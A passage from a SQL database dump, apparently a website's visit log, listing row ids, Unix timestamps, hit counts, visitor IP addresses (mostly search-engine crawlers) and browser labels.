1554371794,1,1,0,0,'54.36.149.4','other'),(409399,1554371897,1,1,0,0,'54.36.148.241','other'),(409400,1554371949,1,1,0,0,'157.55.39.198','other'),(409401,1554372208,1,1,0,0,'54.36.149.19','other'),(409402,1554373300,1,1,0,0,'46.229.168.139','other'),(409403,1554373345,1,1,0,0,'54.36.149.84','other'),(409404,1554373439,1,1,0,0,'95.135.218.166','chrome'),(409405,1554373478,1,1,0,0,'66.249.66.132','chrome'),(409406,1554373883,1,1,0,0,'54.36.148.251','other'),(409407,1554373922,1,1,0,0,'54.36.148.21','other'),(409408,1554374287,1,1,0,0,'54.36.150.40','other'),(409409,1554374308,1,1,0,0,'8.29.198.27','other'),(409410,1554374449,1,1,0,0,'54.36.148.73','other'),(409411,1554374562,1,1,0,0,'95.163.255.156','other'),(409412,1554374772,1,1,0,0,'54.36.149.63','other'),(409413,1554374781,1,1,0,0,'8.29.198.25','other'),(409414,1554375127,1,1,0,0,'66.249.66.220','chrome'),(409415,1554375269,1,1,0,0,'95.163.255.96','other'),(409416,1554375272,2,2,0,0,'95.163.255.93','other'),(409417,1554375295,2,2,0,0,'207.46.13.142','other'),(409418,1554375309,1,1,0,0,'54.36.148.139','other'),(409419,1554375357,1,1,0,0,'46.229.168.143','other'),(409420,1554375385,1,1,0,0,'54.36.148.154','other'),(409421,1554375470,1,1,0,0,'54.36.148.61','other'),(409422,1554375890,1,1,0,0,'95.163.255.170','other'),(409423,1554376125,1,1,0,0,'46.229.168.163','other'),(409424,1554376198,1,1,0,0,'54.36.149.46','other'),(409425,1554376874,1,1,0,0,'46.229.168.152','other'),(409426,1554377442,1,1,0,0,'66.249.66.83','chrome'),(409427,1554377660,1,1,0,0,'66.249.66.218','chrome'),(409428,1554377738,1,1,0,0,'212.113.43.58','chrome'),(409429,1554377880,1,1,0,0,'54.36.150.149','other'),(409430,1554378169,1,1,0,0,'54.36.148.86','other'),(409431,1554378455,1,1,0,0,'178.94.177.28','chrome'),(409432,1554378503,1,1,0,0,'54.36.150.26','other'),(409433,1554378757,1,1,0,0,'66.249.66.68','chrome'),(409434,1554378765,1,1,0,0,'5.45.207.19','other'),(409435,1554378976,1,1,0,0,'91.196.178.66','chrome'),(409436,1554379080,1,1,0,0,'66.249.66.128','chrome'),(409437,1554379366,1,1,0,0,'178.154.171.27','other'),(409438,1554379518,1,1,0,0,'54.36.149.72','other'),(409439,1554379615,1,1,0,0,'54.36.150.38','other'),(409440,1554379654,1,1,0,0,'95.108.181.75','other'),(409441,1554379696,2,2,0,0,'66.249.66.82','chrome'),(409442,1554379803,1,1,0,0,'66.249.66.83','chrome'),(409443,1554380076,1,1,0,0,'46.229.168.137','other'),(409444,1554380084,1,1,0,0,'95.163.255.165','other'),(409445,1554380198,1,1,0,0,'54.36.148.216','other'),(409446,1554380518,1,1,0,0,'54.36.150.88','other'),(409447,1554380707,1,1,0,0,'54.36.150.177','other'),(409448,1554380722,1,1,0,0,'66.249.66.222','chrome'),(409449,1554380725,1,1,0,0,'54.36.148.64','other'),(409450,1554380947,1,1,0,0,'66.249.66.68','chrome'),(409451,1554381027,1,1,0,0,'87.250.224.47','other'),(409452,1554381107,1,1,0,0,'95.163.255.96','other'),(409453,1554381263,1,1,0,0,'46.229.168.163','other'),(409454,1554381371,1,1,0,0,'46.229.168.146','other'),(409455,1554381771,1,1,0,0,'141.8.142.103','other'),(409456,1554381840,1,1,0,0,'54.36.150.46','other'),(409457,1554381866,1,1,0,0,'54.36.149.97','other'),(409458,1554381927,1,1,0,0,'40.77.167.46','other'),(409459,1554381973,1,1,0,0,'54.36.150.142','other'),(409460,1554382069,1,1,0,0,'54.36.148.26','other'),(409461,1554382089,1,1,0,0,'54.36.149.69','other'),(409462,1554382116,1,1,0,0,'66.249.66.81','chrome'),(409463,1554382170,1,1,0,0,'46.229.168.135','other'),(409464,1554382368,1,1,0,0,'207.46.13.24','other'),(409465,1554382429,1,1,0,0,'54.36.148.255','other'),(409466,1554382621,1,1,0,0,'46.229.168.148','other'),(409467,1554382639,1,1,0,0,'46.229.168.162','other'),(409468,1554382669,1,1,0,0,'54.36.150.143','other'),(409469,1554382749,1,1,0,0,'46.229.168.139','other'),(409470,1554382950,1,1,0,0,'157.55.39.214','other'),(409471,1554383591,2,2,0,0,'207.46.13.24','other'),(409472,1554384462,1,1,0,0,'91.196.178.94','firefox'),(409473,1554384903,1,1,0,0,'54.36.150.144','other'),(409474,1554385046,1,1,0,0,'207.46.13.24','other'),(409475,1554385137,1,1,0,0,'8.29.198.26','other'),(409476,1554385181,1,1,0,0,'46.229.168.161','other'),(409477,1554385352,1,1,0,0,'54.36.150.131','other'),(409478,1554385435,1,1,0,0,'54.36.148.255','other'),(409479,1554385636,1,1,0,0,'8.29.198.25','other'),(409480,1554385703,1,1,0,0,'66.249.66.83','chrome'),(409481,1554385867,1,1,0,0,'46.229.168.149','other'),(409482,1554386016,1,1,0,0,'66.249.66.220','chrome'),(409483,1554386137,1,1,0,0,'66.249.66.218','chrome'),(409484,1554386249,1,1,0,0,'66.249.66.222','chrome'),(409485,1554386499,1,1,0,0,'54.36.148.172','other'),(409486,1554386644,1,1,0,0,'54.36.149.84','other'),(409487,1554386652,2,2,0,0,'66.249.66.130','chrome'),(409488,1554387090,1,1,0,0,'141.8.142.103','other'),(409489,1554387094,1,1,0,0,'54.36.148.138','other'),(409490,1554387313,1,1,0,0,'54.36.150.100','other'),(409491,1554387442,1,1,0,0,'54.36.148.198','other'),(409492,1554387531,1,1,0,0,'66.249.66.128','chrome'),(409493,1554387579,1,1,0,0,'54.36.148.23','other'),(409494,1554387789,1,1,0,0,'54.36.150.123','other'),(409495,1554387839,2,2,0,0,'66.249.66.220','chrome'),(409496,1554387942,1,1,0,0,'54.36.148.231','other'),(409497,1554388019,1,1,0,0,'93.73.173.105','chrome'),(409498,1554388036,1,1,0,0,'54.36.149.25','other'),(409499,1554388115,2,2,0,0,'157.55.39.168','other'),(409500,1554388222,1,1,0,0,'91.196.178.85','chrome'),(409501,1554388234,1,1,0,0,'95.108.213.4','other'),(409502,1554388272,1,1,0,0,'66.249.66.222','chrome'),(409503,1554388711,1,1,0,0,'87.250.224.47','other'),(409504,1554388857,1,1,0,0,'54.36.150.100','other'),(409505,1554388977,1,1,0,0,'54.36.148.136','other'),(409506,1554389026,1,1,0,0,'46.229.168.132','other'),(409507,1554389136,1,1,0,0,'54.36.150.95','other'),(409508,1554389171,1,1,0,0,'66.249.66.218','chrome'),(409509,1554389178,1,1,0,0,'54.36.149.58','other'),(409510,1554389181,1,1,0,0,'54.36.148.142','other'),(409511,1554389372,2,2,0,0,'66.249.66.222','chrome'),(409512,1554389389,1,1,0,0,'66.249.66.132','chrome'),(409513,1554389697,1,1,0,0,'54.36.149.106','other'),(409514,1554389712,1,1,0,0,'66.249.66.128','chrome'),(409515,1554389964,1,1,0,0,'54.36.149.74','other'),(409516,1554390035,1,1,0,0,'46.229.168.132','other'),(409517,1554390354,1,1,0,0,'54.36.150.44','other'),(409518,1554391222,4,4,0,0,'66.249.66.218','chrome'),(409519,1554391279,1,1,0,0,'46.229.168.142','other'),(409520,1554391539,1,1,0,0,'54.36.150.180','other'),(409521,1554391572,1,1,0,0,'54.36.148.151','other'),(409522,1554391599,1,1,0,0,'54.36.150.178','other'),(409523,1554391739,2,2,0,0,'66.249.66.220','chrome'),(409524,1554391754,1,1,0,0,'54.36.149.49','other'),(409525,1554392086,1,1,0,0,'54.36.149.85','other'),(409526,1554392126,1,1,0,0,'54.36.148.253','other'),(409527,1554392619,1,1,0,0,'54.36.148.143','other'),(409528,1554392904,1,1,0,0,'66.249.66.220','chrome'),(409529,1554392914,1,1,0,0,'95.163.255.97','other'),(409530,1554393006,1,1,0,0,'54.36.148.173','other'),(409531,1554393215,1,1,0,0,'54.36.149.31','other'),(409532,1554393278,1,1,0,0,'95.163.255.96','other'),(409533,1554393297,1,1,0,0,'54.36.149.68','other'),(409534,1554393308,1,1,0,0,'95.163.255.179','other'),(409535,1554393333,1,1,0,0,'66.249.66.222','chrome'),(409536,1554393361,1,1,0,0,'54.36.148.197','other'),(409537,1554393384,1,1,0,0,'66.249.66.128','chrome'),(409538,1554394157,1,1,0,0,'54.36.150.43','other'),(409539,1554394176,1,1,0,0,'46.229.168.129','other'),(409540,1554394213,2,2,0,0,'66.249.66.218','chrome'),(409541,1554394301,1,1,0,0,'46.229.168.148','other'),(409542,1554394352,1,1,0,0,'54.36.150.188','other'),(409543,1554394744,1,1,0,0,'54.36.148.149','other'),(409544,1554394872,1,1,0,0,'54.36.148.13','other'),(409545,1554394943,1,1,0,0,'54.36.149.86','other'),(409546,1554395039,2,2,0,0,'66.249.66.222','chrome'),(409547,1554395365,1,1,0,0,'54.36.149.27','other'),(409548,1554395787,1,1,0,0,'54.36.148.238','other'),(409549,1554395886,1,1,0,0,'66.249.66.132','chrome'),(409550,1554395970,1,1,0,0,'8.29.198.26','other'),(409551,1554396025,1,1,0,0,'66.249.66.218','chrome'),(409552,1554396043,1,1,0,0,'141.8.142.103','other'),(409553,1554396094,1,1,0,0,'46.229.168.147','other'),(409554,1554396206,1,1,0,0,'37.9.113.20','other'),(409555,1554396231,1,1,0,0,'54.36.150.10','other'),(409556,1554396248,3,3,0,0,'178.154.244.11','other'),(409557,1554396287,1,1,0,0,'5.45.207.19','other'),(409558,1554396446,1,1,0,0,'54.36.148.60','other'),(409559,1554396487,1,1,0,0,'8.29.198.27','other'),(409560,1554396582,1,1,0,0,'46.229.168.153','other'),(409561,1554396764,1,1,0,0,'54.36.148.226','other'),(409562,1554396895,1,1,0,0,'207.46.13.41','other'),(409563,1554396934,1,1,0,0,'95.108.213.4','other'),(409564,1554396979,1,1,0,0,'5.45.207.79','other'),(409565,1554397216,1,1,0,0,'91.196.178.162','chrome'),(409566,1554397623,1,1,0,0,'54.36.150.147','other'),(409567,1554397753,1,1,0,0,'46.229.168.133','other'),(409568,1554398051,1,1,0,0,'46.229.168.151','other'),(409569,1554398341,1,1,0,0,'54.36.149.103','other'),(409570,1554398438,1,1,0,0,'66.249.66.220','chrome'),(409571,1554398593,1,1,0,0,'54.36.148.4','other'),(409572,1554398673,1,1,0,0,'180.76.15.27','other'),(409573,1554399066,1,1,0,0,'95.163.255.159','other'),(409574,1554399268,1,1,0,0,'54.36.148.19','other'),(409575,1554399487,1,1,0,0,'207.46.13.89','other'),(409576,1554400112,1,1,0,0,'54.36.150.148','other'),(409577,1554400251,1,1,0,0,'46.229.168.129','other'),(409578,1554400382,2,2,0,0,'54.36.150.6','other'),(409579,1554400435,1,1,0,0,'46.229.168.148','other'),(409580,1554401131,1,1,0,0,'54.36.148.174','other'),(409581,1554401995,1,1,0,0,'66.249.66.220','chrome'),(409582,1554402000,1,1,0,0,'54.36.149.35','other'),(409583,1554402036,1,1,0,0,'46.229.168.141','other'),(409584,1554402070,1,1,0,0,'46.229.168.147','other'),(409585,1554402096,1,1,0,0,'46.229.168.137','other'),(409586,1554402510,1,1,0,0,'66.249.66.218','chrome'),(409587,1554402514,1,1,0,0,'207.46.13.89','other'),(409588,1554402848,1,1,0,0,'66.249.66.132','chrome'),(409589,1554402854,1,1,0,0,'46.229.168.149','other'),(409590,1554402978,1,1,0,0,'66.249.66.220','chrome'),(409591,1554403268,1,1,0,0,'54.36.148.35','other'),(409592,1554403465,1,1,0,0,'54.36.148.240','other'),(409593,1554403922,1,1,0,0,'54.36.150.152','other'),(409594,1554404248,1,1,0,0,'54.36.150.53','other'),(409595,1554404332,1,1,0,0,'54.36.148.114','other'),(409596,1554404420,1,1,0,0,'178.154.244.11','other'),(409597,1554404461,1,1,0,0,'207.46.13.41','other'),(409598,1554404469,1,1,0,0,'54.36.150.31','other'),(409599,1554404554,1,1,0,0,'54.36.149.43','other'),(409600,1554404901,1,1,0,0,'46.229.168.154','other'),(409601,1554405266,1,1,0,0,'54.36.150.93','other'),(409602,1554405405,1,1,0,0,'46.229.168.137','other'),(409603,1554405641,1,1,0,0,'46.229.168.161','other'),(409604,1554405756,1,1,0,0,'46.229.168.141','other'),(409605,1554405949,2,2,0,0,'66.249.66.222','chrome'),(409606,1554406012,1,1,0,0,'46.229.168.148','other'),(409607,1554406138,1,1,0,0,'207.46.13.189','other'),(409608,1554406149,1,1,0,0,'54.36.149.39','other'),(409609,1554406539,1,1,0,0,'54.36.148.59','other'),(409610,1554406642,1,1,0,0,'193.106.30.98','firefox'),(409611,1554406643,1,1,0,0,'66.249.66.220','chrome'),(409612,1554406651,1,1,0,0,'66.249.66.128','chrome'),(409613,1554406796,2,2,0,0,'8.29.198.25','other'),(409614,1554406868,1,1,0,0,'66.249.66.218','chrome'),(409615,1554407136,1,1,0,0,'40.77.167.10','other'),(409616,1554408353,1,1,0,0,'207.46.13.41','other'),(409617,1554408592,1,1,0,0,'54.36.150.50','other'),(409618,1554408660,1,1,0,0,'66.249.66.220','chrome'),(409619,1554408872,1,1,0,0,'66.249.66.218','chrome'),(409620,1554408917,1,1,0,0,'46.229.168.154','other'),(409621,1554409249,1,1,0,0,'54.36.148.58','other'),(409622,1554409982,1,1,0,0,'54.36.150.131','other'),(409623,1554410639,1,1,0,0,'66.249.66.128','chrome'),(409624,1554410874,1,1,0,0,'54.36.148.98','other'),(409625,1554411168,1,1,0,0,'207.46.13.41','other'),(409626,1554411193,1,1,0,0,'54.36.149.99','other'),(409627,1554411349,1,1,0,0,'54.36.148.74','other'),(409628,1554411804,1,1,0,0,'46.229.168.129','other'),(409629,1554411911,1,1,0,0,'178.154.244.11','other'),(409630,1554411933,1,1,0,0,'40.77.167.143','other'),(409631,1554412042,1,1,0,0,'5.45.207.79','other'),(409632,1554412149,1,1,0,0,'216.244.66.241','other'),(409633,1554412296,1,1,0,0,'5.45.207.19','other'),(409634,1554412478,1,1,0,0,'54.36.148.185','other'),(409635,1554412777,1,1,0,0,'37.9.113.20','other'),(409636,1554413000,1,1,0,0,'54.36.149.7','other'),(409637,1554413077,1,1,0,0,'46.229.168.143','other'),(409638,1554413149,2,2,0,0,'66.249.66.220','chrome'),(409639,1554413411,1,1,0,0,'66.249.66.222','chrome'),(409640,1554413751,1,1,0,0,'157.55.39.56','other'),(409641,1554414242,1,1,0,0,'46.229.168.135','other'),(409642,1554414417,1,1,0,0,'54.36.150.67','other'),(409643,1554414487,2,2,0,0,'66.249.66.222','chrome'),(409644,1554414548,4,4,0,0,'66.249.66.218','chrome'),(409645,1554414921,1,1,0,0,'46.229.168.129','other'),(409646,1554415204,2,2,0,0,'66.249.66.220','chrome'),(409647,1554415256,1,1,0,0,'54.36.150.44','other'),(409648,1554415512,1,1,0,0,'54.36.148.191','other'),(409649,1554416028,1,1,0,0,'54.36.149.85','other'),(409650,1554416119,1,1,0,0,'66.249.66.220','chrome'),(409651,1554416615,1,1,0,0,'95.163.255.96','other'),(409652,1554416718,1,1,0,0,'54.36.150.7','other'),(409653,1554416967,1,1,0,0,'54.36.150.132','other'),(409654,1554417134,1,1,0,0,'54.36.148.164','other'),(409655,1554417252,1,1,0,0,'54.36.148.144','other'),(409656,1554417632,2,2,0,0,'8.29.198.27','other'),(409657,1554417661,1,1,0,0,'40.77.167.206','other'),(409658,1554417682,1,1,0,0,'51.255.65.46','other'),(409659,1554417698,1,1,0,0,'54.36.148.196','other'),(409660,1554417921,1,1,0,0,'54.36.150.139','other'),(409661,1554418199,1,1,0,0,'54.36.150.8','other'),(409662,1554418399,1,1,0,0,'54.36.150.98','other'),(409663,1554418425,1,1,0,0,'54.36.150.157','other'),(409664,1554418520,1,1,0,0,'95.163.255.93','other'),(409665,1554418525,1,1,0,0,'54.36.148.248','other'),(409666,1554418867,1,1,0,0,'54.36.148.176','other'),(409667,1554418926,1,1,0,0,'95.132.11.230','other'),(409668,1554419285,1,1,0,0,'40.77.167.206','other'),(409669,1554419546,1,1,0,0,'128.72.159.196','msie'),(409670,1554419716,1,0,1,0,'66.249.66.218',''),(409671,1554419841,1,1,0,0,'66.249.66.218','chrome'),(409672,1554419876,1,1,0,0,'178.154.244.65','other'),(409673,1554419919,1,1,0,0,'66.249.66.128','chrome'),(409674,1554419929,1,1,0,0,'66.249.66.130','chrome'),(409675,1554419931,1,1,0,0,'87.250.224.81','other'),(409676,1554419973,2,2,0,0,'213.180.203.9','other'),(409677,1554420010,1,1,0,0,'54.36.148.194','other'),(409678,1554420413,1,1,0,0,'178.154.200.48','other'),(409679,1554420560,1,1,0,0,'54.36.150.79','other'),(409680,1554420642,1,1,0,0,'95.108.213.4','other'),(409681,1554420782,1,1,0,0,'46.229.168.141','other'),(409682,1554421291,1,1,0,0,'46.229.168.148','other'),(409683,1554421392,1,1,0,0,'54.36.150.61','other'),(409684,1554421433,1,1,0,0,'54.36.150.167','other'),(409685,1554421611,1,1,0,0,'66.249.66.128','chrome'),(409686,1554421622,1,1,0,0,'66.249.66.222','chrome'),(409687,1554421628,1,1,0,0,'54.36.149.62','other'),(409688,1554421660,1,1,0,0,'46.229.168.133','other'),(409689,1554421701,1,1,0,0,'54.36.148.131','other'),(409690,1554421753,2,2,0,0,'66.249.66.218','chrome'),(409691,1554421967,1,1,0,0,'95.163.255.166','other'),(409692,1554422068,1,1,0,0,'54.36.150.39','other'),(409693,1554422773,1,1,0,0,'66.249.66.220','chrome'),(409694,1554422998,1,1,0,0,'54.36.150.7','other'),(409695,1554423034,1,1,0,0,'54.36.150.112','other'),(409696,1554423823,1,1,0,0,'95.163.255.96','other'),(409697,1554423826,1,1,0,0,'54.36.150.75','other'),(409698,1554423920,1,1,0,0,'66.249.66.130','chrome'),(409699,1554424004,2,2,0,0,'40.77.167.143','other'),(409700,1554424163,1,1,0,0,'54.36.150.3','other'),(409701,1554424410,1,1,0,0,'66.249.66.132','chrome'),(409702,1554424535,1,1,0,0,'157.55.39.56','other'),(409703,1554424850,1,1,0,0,'178.154.244.11','other'),(409704,1554424852,1,1,0,0,'95.108.213.4','other'),(409705,1554425817,1,1,0,0,'207.46.13.66','other'),(409706,1554425937,1,1,0,0,'54.36.150.117','other'),(409707,1554425995,1,1,0,0,'216.244.66.241','other'),(409708,1554426021,1,1,0,0,'66.249.66.218','chrome'),(409709,1554426253,1,1,0,0,'54.36.149.11','other'),(409710,1554426645,1,1,0,0,'66.249.66.132','chrome'),(409711,1554426952,1,1,0,0,'54.36.149.72','other'),(409712,1554426992,1,1,0,0,'66.249.66.130','chrome'),(409713,1554427105,1,1,0,0,'5.45.207.19','other'),(409714,1554427110,1,1,0,0,'46.229.168.132','other'),(409715,1554427237,1,1,0,0,'40.77.167.143','other'),(409716,1554427403,1,1,0,0,'54.36.149.18','other'),(409717,1554427458,1,1,0,0,'87.250.224.47','other'),(409718,1554427511,1,1,0,0,'54.36.150.37','other'),(409719,1554427518,1,1,0,0,'54.36.148.110','other'),(409720,1554427704,1,1,0,0,'95.163.255.194','other'),(409721,1554427946,2,2,0,0,'66.249.66.132','chrome'),(409722,1554428221,1,1,0,0,'95.163.255.94','other'),(409723,1554428372,2,2,0,0,'66.249.66.218','chrome'),(409724,1554428442,1,1,0,0,'178.121.241.211','chrome'),(409725,1554428458,2,2,0,0,'66.249.66.220','chrome'),(409726,1554428461,1,1,0,0,'8.29.198.27','other'),(409727,1554428532,1,1,0,0,'54.36.148.93','other'),(409728,1554428654,1,1,0,0,'13.57.233.99','chrome'),(409729,1554428942,1,1,0,0,'54.36.148.219','other'),(409730,1554428965,1,1,0,0,'54.36.148.198','other'),(409731,1554429018,1,1,0,0,'8.29.198.26','other'),(409732,1554429835,1,1,0,0,'54.36.148.111','other'),(409733,1554430138,2,2,0,0,'66.249.66.220','chrome'),(409734,1554430327,1,1,0,0,'66.249.66.218','chrome'),(409735,1554430422,1,1,0,0,'46.229.168.149','other'),(409736,1554430701,1,1,0,0,'54.36.148.123','other'),(409737,1554430763,1,1,0,0,'54.36.149.7','other'),(409738,1554430924,1,1,0,0,'54.36.148.255','other'),(409739,1554431877,1,1,0,0,'54.36.148.154','other'),(409740,1554432209,1,1,0,0,'54.36.150.19','other'),(409741,1554432269,1,1,0,0,'216.244.66.241','other'),(409742,1554432372,1,1,0,0,'40.77.167.157','other'),(409743,1554432393,1,1,0,0,'207.46.13.66','other'),(409744,1554432397,2,2,0,0,'34.213.92.70','chrome'),(409745,1554432596,1,1,0,0,'66.249.66.222','chrome'),(409746,1554433068,1,1,0,0,'141.8.142.103','other'),(409747,1554433123,1,1,0,0,'109.74.154.72','chrome'),(409748,1554433187,1,1,0,0,'54.36.150.119','other'),(409749,1554433234,1,1,0,0,'178.154.244.11','other'),(409750,1554433337,1,1,0,0,'54.36.148.129','other'),(409751,1554433511,1,1,0,0,'46.229.168.132','other'),(409752,1554433570,1,1,0,0,'54.36.149.32','other'),(409753,1554433960,1,1,0,0,'54.36.149.78','other'),(409754,1554433969,1,1,0,0,'66.249.66.222','chrome'),(409755,1554434235,1,1,0,0,'54.36.149.59','other'),(409756,1554434294,1,1,0,0,'207.46.13.173','other'),(409757,1554434314,2,2,0,0,'54.36.150.171','other'),(409758,1554434370,2,2,0,0,'66.249.66.218','chrome'),(409759,1554434375,1,1,0,0,'54.36.148.215','other'),(409760,1554434433,1,1,0,0,'95.163.255.93','other'),(409761,1554434525,3,3,0,0,'40.77.167.157','other'),(409762,1554434556,1,1,0,0,'40.77.167.115','other'),(409763,1554434945,1,1,0,0,'66.249.66.222','chrome'),(409764,1554435006,3,3,0,0,'66.249.66.220','chrome'),(409765,1554435116,1,1,0,0,'188.243.184.130','firefox'),(409766,1554435316,1,1,0,0,'54.36.149.71','other'),(409767,1554435416,1,1,0,0,'54.36.150.98','other'),(409768,1554435539,1,1,0,0,'54.36.150.91','other'),(409769,1554435787,1,1,0,0,'91.196.178.129','firefox'),(409770,1554435797,1,1,0,0,'42.236.10.92','other'),(409771,1554435800,1,1,0,0,'54.36.148.71','other'),(409772,1554435806,2,2,0,0,'180.163.220.3','other'),(409773,1554435845,1,1,0,0,'95.163.255.96','other'),(409774,1554435931,1,1,0,0,'66.249.66.132','chrome'),(409775,1554435983,1,1,0,0,'54.36.148.45','other'),(409776,1554436326,1,1,0,0,'54.36.149.75','other'),(409777,1554436512,1,1,0,0,'66.249.66.218','chrome'),(409778,1554436572,1,1,0,0,'66.249.66.222','chrome'),(409779,1554437037,1,1,0,0,'46.229.168.135','other'),(409780,1554437135,1,1,0,0,'46.229.168.137','other'),(409781,1554438026,1,1,0,0,'54.36.150.143','other'),(409782,1554438032,1,1,0,0,'46.229.168.133','other'),(409783,1554438447,1,1,0,0,'95.24.20.66','msie'),(409784,1554438493,1,1,0,0,'66.249.66.220','chrome'),(409785,1554438747,1,1,0,0,'87.250.224.47','other'),(409786,1554439283,1,1,0,0,'8.29.198.25','other'),(409787,1554439474,5,5,0,0,'66.249.66.218','chrome'),(409788,1554439600,1,1,0,0,'54.36.149.75','other'),(409789,1554439658,1,1,0,0,'95.163.255.197','other'),(409790,1554439664,1,1,0,0,'66.249.66.132','chrome'),(409791,1554439782,1,1,0,0,'54.36.148.209','other'),(409792,1554439837,1,1,0,0,'66.249.66.222','chrome'),(409793,1554439845,1,1,0,0,'54.36.148.148','other'),(409794,1554439856,1,1,0,0,'8.29.198.27','other'),(409795,1554440361,1,1,0,0,'95.163.255.96','other'),(409796,1554440396,1,1,0,0,'54.36.149.36','other'),(409797,1554440407,1,1,0,0,'54.36.149.105','other'),(409798,1554440533,1,1,0,0,'54.36.148.211','other'),(409799,1554440575,1,1,0,0,'207.46.13.66','other'),(409800,1554440654,1,1,0,0,'40.77.167.157','other'),(409801,1554440886,1,1,0,0,'46.229.168.135','other'),(409802,1554440924,2,2,0,0,'66.249.66.220','chrome'),(409803,1554441095,1,1,0,0,'54.36.150.7','other'),(409804,1554441445,1,1,0,0,'66.249.66.218','chrome'),(409805,1554441571,1,1,0,0,'66.249.66.82','chrome'),(409806,1554441672,1,1,0,0,'54.36.148.193','other'),(409807,1554441688,1,1,0,0,'46.211.74.87','chrome'),(409808,1554441778,1,1,0,0,'46.229.168.144','other'),(409809,1554442320,1,1,0,0,'54.36.150.156','other'),(409810,1554442444,1,1,0,0,'185.220.101.15','other'),(409811,1554442557,1,1,0,0,'54.36.148.18','other'),(409812,1554442577,1,1,0,0,'54.36.148.66','other'),(409813,1554442815,1,1,0,0,'46.229.168.133','other'),(409814,1554442834,1,1,0,0,'157.55.39.111','other'),(409815,1554442915,1,1,0,0,'66.249.66.82','chrome'),(409816,1554443144,1,1,0,0,'66.249.66.81','chrome'),(409817,1554443302,1,1,0,0,'54.36.148.1','other'),(409818,1554443402,1,1,0,0,'66.249.66.132','chrome'),(409819,1554443638,1,1,0,0,'54.36.148.227','other'),(409820,1554444001,1,1,0,0,'5.45.207.79','other'),(409821,1554444004,2,2,0,0,'5.45.207.19','other'),(409822,1554444020,1,1,0,0,'54.36.148.192','other'),(409823,1554444243,1,1,0,0,'95.163.255.192','other'),(409824,1554444504,1,1,0,0,'46.229.168.148','other'),(409825,1554444678,2,2,0,0,'66.249.66.222','chrome'),(409826,1554444683,1,1,0,0,'66.249.66.128','chrome'),(409827,1554444711,1,1,0,0,'207.46.13.66','other'),(409828,1554444788,1,1,0,0,'180.76.15.33','other'),(409829,1554445188,1,1,0,0,'216.244.66.241','other'),(409830,1554445260,1,1,0,0,'46.229.168.146','other'),(409831,1554446250,3,3,0,0,'66.249.66.220','chrome'),(409832,1554446253,1,1,0,0,'40.77.167.115','other'),(409833,1554446265,1,1,0,0,'95.163.255.98','other'),(409834,1554446528,1,1,0,0,'54.36.148.113','other'),(409835,1554446578,1,1,0,0,'66.249.66.222','chrome'),(409836,1554446725,1,1,0,0,'46.229.168.146','other'),(409837,1554447052,1,1,0,0,'66.249.66.218','chrome'),(409838,1554447164,1,1,0,0,'54.36.148.204','other'),(409839,1554447398,1,1,0,0,'46.229.168.152','other'),(409840,1554447449,1,1,0,0,'207.46.13.66','other'),(409841,1554447571,1,1,0,0,'54.36.150.144','other'),(409842,1554447728,1,1,0,0,'54.36.150.142','other'),(409843,1554447922,1,1,0,0,'54.36.150.86','other'),(409844,1554448028,1,1,0,0,'40.77.167.44','other'),(409845,1554448149,1,1,0,0,'66.249.66.220','chrome'),(409846,1554448756,3,3,0,0,'66.249.66.222','chrome'),(409847,1554448870,1,1,0,0,'54.36.149.100','other'),(409848,1554448909,1,1,0,0,'54.36.149.13','other'),(409849,1554449122,2,2,0,0,'141.8.142.103','other'),(409850,1554449141,3,3,0,0,'178.154.244.11','other'),(409851,1554449217,1,1,0,0,'5.45.207.19','other'),(409852,1554449605,1,1,0,0,'66.249.66.82','chrome'),(409853,1554449671,1,1,0,0,'209.17.96.50','other'),(409854,1554449683,1,1,0,0,'207.46.13.66','other'),(409855,1554449973,1,1,0,0,'89.163.242.241','opera'),(409856,1554450000,1,1,0,0,'95.163.255.156','other'),(409857,1554450114,1,1,0,0,'8.29.198.26','other'),(409858,1554450644,1,1,0,0,'178.137.17.200','chrome'),(409859,1554450681,1,1,0,0,'40.77.167.138','other'),(409860,1554450695,1,1,0,0,'8.29.198.25','other'),(409861,1554451032,1,1,0,0,'66.249.66.220','chrome'),(409862,1554451294,1,1,0,0,'66.249.66.222','chrome'),(409863,1554451571,1,1,0,0,'66.249.66.82','chrome'),(409864,1554451660,1,1,0,0,'54.36.148.123','other'),(409865,1554451815,1,1,0,0,'94.153.229.229','chrome'),(409866,1554451900,1,1,0,0,'95.163.255.94','other'),(409867,1554451901,1,1,0,0,'40.77.167.138','other'),(409868,1554451984,1,1,0,0,'54.36.150.157','other'),(409869,1554452287,1,1,0,0,'46.229.168.135','other'),(409870,1554452618,2,2,0,0,'66.249.66.220','chrome'),(409871,1554452884,1,1,0,0,'66.249.66.218','chrome'),(409872,1554452919,2,2,0,0,'46.229.168.134','other'),(409873,1554452988,1,1,0,0,'66.249.66.222','chrome'),(409874,1554453474,1,1,0,0,'157.55.39.209','other'),(409875,1554453513,1,1,0,0,'66.249.66.82','chrome'),(409876,1554453532,1,1,0,0,'66.249.66.220','chrome'),(409877,1554453582,1,1,0,0,'66.249.66.81','chrome'),(409878,1554453646,1,1,0,0,'13.66.139.0','other'),(409879,1554453687,1,1,0,0,'54.36.149.50','other'),(409880,1554453893,1,1,0,0,'178.154.244.11','other'),(409881,1554453895,1,1,0,0,'54.36.150.172','other'),(409882,1554453906,1,1,0,0,'54.36.148.136','other'),(409883,1554453960,1,1,0,0,'178.154.171.24','other'),(409884,1554454077,1,1,0,0,'95.108.213.4','other'),(409885,1554454156,1,1,0,0,'95.163.255.92','other'),(409886,1554454179,1,1,0,0,'46.229.168.149','other'),(409887,1554454181,1,1,0,0,'54.36.148.197','other'),(409888,1554454183,1,1,0,0,'54.36.150.13','other'),(409889,1554454743,2,2,0,0,'66.249.66.130','chrome'),(409890,1554454869,1,1,0,0,'91.209.11.236','other'),(409891,1554454958,1,1,0,0,'54.36.150.56','other'),(409892,1554454980,1,1,0,0,'54.36.149.45','other'),(409893,1554454991,1,1,0,0,'66.249.66.132','chrome'),(409894,1554455136,1,1,0,0,'54.36.150.9','other'),(409895,1554455175,1,1,0,0,'95.163.255.188','other'),(409896,1554455189,1,1,0,0,'66.249.66.218','chrome'),(409897,1554455205,1,1,0,0,'54.36.150.144','other'),(409898,1554455235,1,1,0,0,'66.249.66.220','chrome'),(409899,1554455275,1,1,0,0,'54.36.150.65','other'),(409900,1554455315,1,1,0,0,'54.36.148.67','other'),(409901,1554455508,1,1,0,0,'66.249.66.83','chrome'),(409902,1554455833,1,1,0,0,'95.163.255.165','other'),(409903,1554456128,1,1,0,0,'91.196.178.66','chrome'),(409904,1554456247,1,1,0,0,'54.36.148.183','other'),(409905,1554456301,1,1,0,0,'46.229.168.145','other'),(409906,1554456704,1,1,0,0,'